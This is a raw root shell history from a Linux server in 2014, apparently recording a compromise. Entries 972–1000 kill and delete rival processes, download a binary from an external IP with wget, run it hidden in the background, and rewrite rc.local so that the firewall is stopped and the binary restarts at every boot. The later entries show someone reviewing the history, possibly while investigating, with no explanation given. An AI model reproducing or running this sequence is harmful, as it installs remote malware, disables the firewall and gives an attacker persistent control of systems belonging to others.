  972  2014-01-20 22:28:20 root rm -f -r /tmp/java.2.15.22_20
  973  2014-01-20 22:28:20 root rm -f -r /tmp/linuxssh
  974  2014-01-20 22:28:20 root rm -f -r /tmp/strutsbin
  975  2014-01-20 22:28:20 root rm -f -r /tmp/266189
  976  2014-01-20 22:28:20 root rm -f -r etc/java.13.2.8_11
  977  2014-01-20 22:28:20 root rm -f -r /etc/auto.bin
  978  2014-01-20 22:28:20 root find /etc/ -name "*.service2" -exec rm {} \;
  979  2014-01-20 22:28:20 root killall java-2013
  980  2014-01-20 22:28:20 root killall wins
  981  2014-01-20 22:28:20 root rm -f -r /etc/wins
  982  2014-01-20 22:28:20 root rm -f -r /etc/java-2013
  983  2014-01-20 22:28:20 root rm -f -r /etc/java-2013/java-2013
  984  2014-01-20 22:28:20 root mkdir /etc/wins
  985  2014-01-20 22:28:20 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
  986  2014-01-20 22:28:21 root chmod 0755 /etc/wins/wins
  987  2014-01-20 22:28:21 root nohup /etc/wins/wins > /dev/null 2>&1 &
  988  2014-01-20 22:28:21 root rm -f -r /etc/rc.local
  989  2014-01-20 22:28:21 root rm -r -f /etc/rc.d/rc.local
  990  2014-01-20 22:28:21 root echo "/etc/init.d/iptables stop">>/etc/rc.local
  991  2014-01-20 22:28:21 root echo "cd /etc/wins">>/etc/rc.local
  992  2014-01-20 22:28:21 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
  993  2014-01-20 22:28:21 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
  994  2014-01-20 22:28:21 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
  995  2014-01-20 22:28:21 root echo "cd /etc/wins">>/etc/rc.d/rc.local
  996  2014-01-20 22:28:21 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
  997  2014-01-20 22:28:21 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
  998  2014-01-20 22:28:21 root rm -f -r 2618
  999  2014-01-20 22:28:21 root rm -r -f TS269
1000  2014-01-20 22:28:21 root exit
1001  2014-01-20 22:31:17 root vi killback.sh
1002  2014-01-20 22:32:37 root cd /tmp/
1003  2014-01-20 22:32:37 root ls
1004  2014-01-20 22:32:39 root ll
1005  2014-01-20 22:32:46 root rm java.pl
1006  2014-01-20 22:32:51 root vi java.pl
1007  2014-01-20 22:33:26 root history
1008  2014-01-20 22:33:55 root cat /etc/rc.local
1009  2014-01-20 22:38:33 root history|grep wget
1010  2014-01-20 23:11:31 root history|more
1011  2014-01-20 23:14:47 root history > /tmp/tttt
[root@web tmp]#
